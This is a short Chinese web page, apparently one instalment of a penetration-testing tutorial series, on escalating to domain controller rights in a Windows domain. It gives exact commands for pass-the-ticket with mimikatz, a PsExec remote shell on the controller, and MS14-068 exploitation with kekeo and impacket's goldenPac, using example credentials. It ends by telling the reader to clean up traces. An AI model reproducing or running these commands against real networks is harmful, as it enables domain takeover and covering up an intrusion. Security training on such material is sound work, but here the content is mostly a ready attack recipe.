主页 > 网络知识 > 渗透贯穿始终中篇(8)

渗透贯穿始终中篇(8)

20201123154403840.png

使用mimikatz将ccache文件导入,提升为域控权限

kerberos::ptc TGT_administrator@test.com.ccache

20201123154903458.png

成功dir域控服务器C盘

20201123155042243.png

使用psexec.exe获取一个交互式shell

PsExec.exe \\DC.test.com cmd

20201123153228508.png

获取域控的ip地址

20201123153021631.png

其他方法1:kekeo.exe

(https://github.com/gentilkiwi/kekeo/releases)
通过kekeo.exe获取域控权限,此工具并非每次都能成功利用。【注入内存中】
kekeo.exe “exploit::ms14068 /domain:test.com /user:administrator /password:root@123456 /ptt” “exit”

其他方法2:goldenPac.exe

(https://github.com/maaaaz/impacket-examples-windows)
此工具是impacket工具包里的,它是MS14-068+psexec的组合;
goldenPac.exe test.com/administrator:root@123456@DC.test.com

之后进行痕迹清理

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!